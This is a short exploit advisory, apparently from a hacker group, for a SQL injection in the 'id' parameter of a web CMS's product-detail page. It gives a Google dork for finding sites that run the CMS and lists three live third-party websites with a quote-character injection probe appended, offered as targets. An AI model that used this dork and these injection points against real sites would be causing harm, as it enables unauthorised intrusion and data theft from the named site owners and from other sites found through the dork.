######################
# Exploit Title : Cw CMS SQL Injection vulnerability
# Vendor Homepage : http://cw.in.th
# Google Dork : intext:"WEB DESIGN BY CW.IN.TH"
# Exploit Author : Persian Hack Team
# Category: Webapplication
# Tested on: Windows 8
# Date: 2016/07/05
######################
#
# PoC:
# id Parameter Vulnerable To SQL Injection:
#
# Demo :
# http://www.site.com/product-detail.php?id=[Sql Injection]
#
# LiveDemo :
# https://www.mtecleaning.com/product-detail.php?id=162'
# http://www.sirongroup.com/project-detail.php?id=23'
# http://ledsinnovation.com/portfolio-detail.php?ID=1'
######################
# Discovered By : Mr_Mask_Black (mmk.mohammad@yahoo.com)
# Greetz :Mojtaba Mobham - T3NZOG4N - FireKernel - peyman - hossein - kian error - king dawn - white wolf - ahmad danger
# Homepage : http://persian-team.ir
######################